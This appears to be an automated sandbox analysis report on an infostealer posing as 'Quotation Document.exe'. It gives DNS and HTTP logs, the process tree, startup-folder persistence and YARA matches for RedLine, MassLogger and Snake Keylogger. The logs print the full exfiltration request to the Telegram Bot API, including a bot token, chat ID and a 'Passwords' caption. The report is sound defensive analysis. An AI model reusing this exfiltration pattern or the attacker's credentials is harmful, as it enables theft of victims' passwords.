                                                              Nov 1, 2024 00:38:52.848078966 CET192.168.2.41.1.1.10xa933Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:45.283238888 CET1.1.1.1192.168.2.40x5551No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:46.392575979 CET1.1.1.1192.168.2.40xe7feNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:46.392575979 CET1.1.1.1192.168.2.40xe7feNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                              Nov 1, 2024 00:38:52.856120110 CET1.1.1.1192.168.2.40xa933No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                              • reallyfreegeoip.org
                                                              • api.telegram.org
                                                              • checkip.dyndns.org
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449826193.122.6.168808080C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 1, 2024 00:38:45.294976950 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 1, 2024 00:38:46.131339073 CET323INHTTP/1.1 200 OK
                                                              Date: Thu, 31 Oct 2024 23:38:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: b50416b13e2997ae527c4ed3a9e5c460
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                              Nov 1, 2024 00:38:46.137242079 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 1, 2024 00:38:46.382054090 CET323INHTTP/1.1 200 OK
                                                              Date: Thu, 31 Oct 2024 23:38:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: b8b3639c320ef627848471cb0ff78040
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                              Nov 1, 2024 00:38:52.402282000 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 1, 2024 00:38:52.842931986 CET323INHTTP/1.1 200 OK
                                                              Date: Thu, 31 Oct 2024 23:38:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: bfe4f3ecd9ec018be620378e8d5c3c7b
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449827188.114.96.34438080C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-31 23:38:47 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-10-31 23:38:47 UTC1221INHTTP/1.1 200 OK
                                                              Date: Thu, 31 Oct 2024 23:38:47 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 359
                                                              Connection: close
                                                              x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                              x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                              x-cache: Miss from cloudfront
                                                              via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                              x-amz-cf-pop: DFW57-P5
                                                              x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 54802
                                                              Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz6k%2Bi2G8SOeHLbrW9%2B8VAcMElH6uwJOPWoYoJJmQVBLHGZrkgiUUUB3tOmLJH39cXt%2FvTvkmsE%2Bo5Rh3RbMpdW0t0hRJkc8QF27F0Up95MiaWUSOrRP4aSakLE%2BWwLEMLHC6pqI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8db77b0cb9f44773-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1586849&cwnd=245&unsent_bytes=0&cid=f0f47d5b762b5269&ts=209&x=0"
                                                              2024-10-31 23:38:47 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                              Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                              2024-10-31 23:38:47 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                              Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449828149.154.167.2204438080C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-31 23:38:53 UTC297OUTPOST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary================8dcf9e3a617256d
                                                              Host: api.telegram.org
                                                              Content-Length: 1090
                                                              Connection: Keep-Alive
                                                              2024-10-31 23:38:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 63 66 39 65 33 61 36 31 37 32 35 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: --===============8dcf9e3a617256dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                              2024-10-31 23:38:54 UTC388INHTTP/1.1 200 OK
                                                              Server: nginx/1.18.0
                                                              Date: Thu, 31 Oct 2024 23:38:53 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 561
                                                              Connection: close
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                              2024-10-31 23:38:54 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 39 31 32 34 35 35 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 45 53 55 4c 54 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6e 75 6d 6d 65 6e 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 36 37 39 37 37 38 36 34 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 6e 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 79 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 6e 61 5f 6d 65 79 65 72 66 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 34 31 37 39 33 33 2c 22 64
                                                              Data Ascii: {"ok":true,"result":{"message_id":15788,"from":{"id":7479124552,"is_bot":true,"first_name":"RESULTNOVA","username":"onummenbot"},"chat":{"id":5679778644,"first_name":"Ina","last_name":"Meyer","username":"Ina_meyerfx","type":"private"},"date":1730417933,"d


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:19:36:54
                                                              Start date:31/10/2024
                                                              Path:C:\Users\user\Desktop\Quotation Document.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Quotation Document.exe"
                                                              Imagebase:0x400000
                                                              File size:1'175'717 bytes
                                                              MD5 hash:CD3C7F532DCFFD81361915BF691CFBD0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:19:37:46
                                                              Start date:31/10/2024
                                                              Path:C:\Users\user\AppData\Local\emboweling\neophobia.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Quotation Document.exe"
                                                              Imagebase:0x400000
                                                              File size:1'175'717 bytes
                                                              MD5 hash:CD3C7F532DCFFD81361915BF691CFBD0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 66%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:19:38:43
                                                              Start date:31/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Quotation Document.exe"
                                                              Imagebase:0x6e0000
                                                              File size:45'984 bytes
                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:8
                                                              Start time:19:38:54
                                                              Start date:31/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
                                                              Imagebase:0x7ff72bec0000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:19:38:54
                                                              Start date:31/10/2024
                                                              Path:C:\Users\user\AppData\Local\emboweling\neophobia.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\emboweling\neophobia.exe"
                                                              Imagebase:0x400000
                                                              File size:1'175'717 bytes
                                                              MD5 hash:CD3C7F532DCFFD81361915BF691CFBD0
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:8.9%
                                                                Dynamic/Decrypted Code Coverage:47.9%
                                                                Signature Coverage:14.4%
                                                                Total number of Nodes:313
                                                                Total number of Limit Nodes:33
                                                                execution_graph 32163 40cbf7 32164 40cc08 32163->32164 32207 40d534 HeapCreate 32164->32207 32167 40cc46 32268 41087e 71 API calls 8 library calls 32167->32268 32170 40cc4c 32171 40cc50 32170->32171 32172 40cc58 __RTC_Initialize 32170->32172 32269 40cbb4 62 API calls 3 library calls 32171->32269 32209 411a15 67 API calls 3 library calls 32172->32209 32174 40cc57 32174->32172 32176 40cc66 32177 40cc72 GetCommandLineA 32176->32177 32178 40cc6a 32176->32178 32210 412892 71 API calls 3 library calls 32177->32210 32270 40e79a 62 API calls 3 library calls 32178->32270 32181 40cc82 32271 4127d7 107 API calls 3 library calls 32181->32271 32182 40cc71 32182->32177 32184 40cc8c 32185 40cc90 32184->32185 32186 40cc98 32184->32186 32272 40e79a 62 API calls 3 library calls 32185->32272 32211 41255f 106 API calls 6 library calls 32186->32211 32189 40cc97 32189->32186 32190 40cc9d 32191 40cca1 32190->32191 32192 40cca9 32190->32192 32273 40e79a 62 API calls 3 library calls 32191->32273 32212 40e859 73 API calls 5 library calls 32192->32212 32195 40ccb0 32197 40ccb5 32195->32197 32198 40ccbc 32195->32198 32196 40cca8 32196->32192 32274 40e79a 62 API calls 3 library calls 32197->32274 32213 4019f0 OleInitialize 32198->32213 32201 40ccbb 32201->32198 32202 40ccd8 32203 40ccea 32202->32203 32275 40ea0a 62 API calls _doexit 32202->32275 32276 40ea36 62 API calls _doexit 32203->32276 32206 40ccef _doexit 32208 40cc3a 32207->32208 32208->32167 32267 40cbb4 62 API calls 3 library calls 32208->32267 32209->32176 32210->32181 32211->32190 32212->32195 32214 401ab9 32213->32214 32277 40b99e 32214->32277 32216 401abf 32217 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 32216->32217 32243 402467 32216->32243 32218 401dc3 CloseHandle GetModuleHandleA 32217->32218 32228 401c55 32217->32228 32290 401650 32218->32290 32220 401e8b FindResourceA LoadResource LockResource SizeofResource 32292 40b84d 32220->32292 32224 401c9c CloseHandle 32224->32202 32225 401ecb _memset 32226 401efc SizeofResource 32225->32226 32227 401f5f 32226->32227 32230 401f1c 32226->32230 32232 401f92 _memset 32227->32232 32349 401560 __VEC_memcpy __fptostr 32227->32349 32228->32224 32229 401cf9 Module32Next 32228->32229 32229->32218 32238 401d0f 32229->32238 32230->32227 32348 401560 __VEC_memcpy __fptostr 32230->32348 32234 401fa2 FreeResource 32232->32234 32235 40b84d _malloc 62 API calls 32234->32235 32236 401fbb SizeofResource 32235->32236 32237 401fe5 _memset 32236->32237 32239 4020aa LoadLibraryA 32237->32239 32238->32224 32242 401dad Module32Next 32238->32242 32240 401650 32239->32240 32241 40216c GetProcAddress 32240->32241 32241->32243 32244 4021aa 32241->32244 32242->32218 32242->32238 32243->32202 32244->32243 32322 4018f0 32244->32322 32246 40243f 32246->32243 32350 40b6b5 62 API calls 2 library calls 32246->32350 32248 4021f1 32248->32246 32334 401870 32248->32334 32250 402269 VariantInit 32251 401870 75 API calls 32250->32251 32252 40228b VariantInit 32251->32252 32253 4022a7 32252->32253 32254 4022d9 SafeArrayCreate SafeArrayAccessData 32253->32254 32339 40b350 32254->32339 32257 40232c 32258 402354 SafeArrayDestroy 32257->32258 32266 40235b 32257->32266 32258->32266 32259 402392 SafeArrayCreateVector 32260 4023a4 32259->32260 32261 4023bc VariantClear VariantClear 32260->32261 32341 4019a0 32261->32341 32264 40242e 32265 4019a0 65 API calls 32264->32265 32265->32246 32266->32259 32267->32167 32268->32170 32269->32174 32270->32182 32271->32184 32272->32189 32273->32196 32274->32201 32275->32203 32276->32206 32280 40b9aa _doexit _strnlen 32277->32280 32278 40b9b8 32351 40bfc1 62 API calls __getptd_noexit 32278->32351 32280->32278 32283 40b9ec 32280->32283 32281 40b9bd 32352 40e744 6 API calls 2 library calls 32281->32352 32353 40d6e0 62 API calls 2 library calls 32283->32353 32285 40b9f3 32354 40b917 120 API calls 3 library calls 32285->32354 32287 40b9cd _doexit 32287->32216 32288 40b9ff 32355 40ba18 LeaveCriticalSection _doexit 32288->32355 32291 4017cc ___crtGetEnvironmentStringsA 32290->32291 32291->32220 32293 40b900 32292->32293 32303 40b85f 32292->32303 32363 40d2e3 6 API calls __decode_pointer 32293->32363 32295 40b906 32364 40bfc1 62 API calls __getptd_noexit 32295->32364 32300 40b8bc RtlAllocateHeap 32300->32303 32301 40b870 32301->32303 32356 40ec4d 62 API calls 2 library calls 32301->32356 32357 40eaa2 62 API calls 7 library calls 32301->32357 32358 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 32301->32358 32303->32300 32303->32301 32304 40b8ec 32303->32304 32307 40b8f1 32303->32307 32309 401ebf 32303->32309 32359 40b7fe 62 API calls 4 library calls 32303->32359 32360 40d2e3 6 API calls __decode_pointer 32303->32360 32361 40bfc1 62 API calls __getptd_noexit 32304->32361 32362 40bfc1 62 API calls __getptd_noexit 32307->32362 32310 40af66 32309->32310 32312 40af70 32310->32312 32311 40b84d _malloc 62 API calls 32311->32312 32312->32311 32313 40af8a 32312->32313 32316 40af8c std::bad_alloc::bad_alloc 32312->32316 32365 40d2e3 6 API calls __decode_pointer 32312->32365 32313->32225 32315 40afb2 32367 40af49 62 API calls std::exception::exception 32315->32367 32316->32315 32366 40d2bd 73 API calls __cinit 32316->32366 32318 40afbc 32368 40cd39 RaiseException 32318->32368 32321 40afca 32323 401903 lstrlenA 32322->32323 32324 4018fc 32322->32324 32369 4017e0 32323->32369 32324->32248 32327 401940 GetLastError 32329 40194b MultiByteToWideChar 32327->32329 32330 40198d 32327->32330 32328 401996 32328->32248 32331 4017e0 72 API calls 32329->32331 32330->32328 32377 401030 GetLastError 32330->32377 32332 401970 MultiByteToWideChar 32331->32332 32332->32330 32335 40af66 74 API calls 32334->32335 32336 40187c 32335->32336 32337 401885 SysAllocString 32336->32337 32338 4018a4 32336->32338 32337->32338 32338->32250 32340 40231a SafeArrayUnaccessData 32339->32340 32340->32257 32342 4019aa InterlockedDecrement 32341->32342 32347 4019df VariantClear 32341->32347 32343 4019b8 32342->32343 32342->32347 32344 4019c2 SysFreeString 32343->32344 32345 4019c9 32343->32345 32343->32347 32344->32345 32381 40aec0 63 API calls 2 library calls 32345->32381 32347->32264 32348->32230 32349->32232 32350->32243 32351->32281 32353->32285 32354->32288 32355->32287 32356->32301 32357->32301 32359->32303 32360->32303 32361->32307 32362->32309 32363->32295 32364->32309 32365->32312 32366->32315 32367->32318 32368->32321 32370 4017e9 32369->32370 32375 401844 32370->32375 32376 40182d 32370->32376 32378 40b783 72 API calls 4 library calls 32370->32378 32374 40186d MultiByteToWideChar 32374->32327 32374->32328 32375->32374 32380 40b743 62 API calls 2 library calls 32375->32380 32376->32375 32379 40b6b5 62 API calls 2 library calls 32376->32379 32378->32376 32379->32375 32380->32375 32381->32347 31980 278d030 31981 278d048 31980->31981 31982 278d0a2 31981->31982 31987 64d4fd8 31981->31987 31991 64d2abc 31981->31991 32000 64d5e08 31981->32000 32009 64d4fe8 31981->32009 31988 64d4fe8 31987->31988 31989 64d2abc CallWindowProcW 31988->31989 31990 64d502f 31989->31990 31990->31982 31992 64d2ac7 31991->31992 31993 64d5e79 31992->31993 31995 64d5e69 31992->31995 32029 64d2be4 31993->32029 32013 64d606c 31995->32013 32019 64d5fa0 31995->32019 32024 64d5f90 31995->32024 31996 64d5e77 31996->31996 32003 64d5e45 32000->32003 32001 64d5e79 32002 64d2be4 CallWindowProcW 32001->32002 32005 64d5e77 32002->32005 32003->32001 32004 64d5e69 32003->32004 32006 64d606c CallWindowProcW 32004->32006 32007 64d5f90 CallWindowProcW 32004->32007 32008 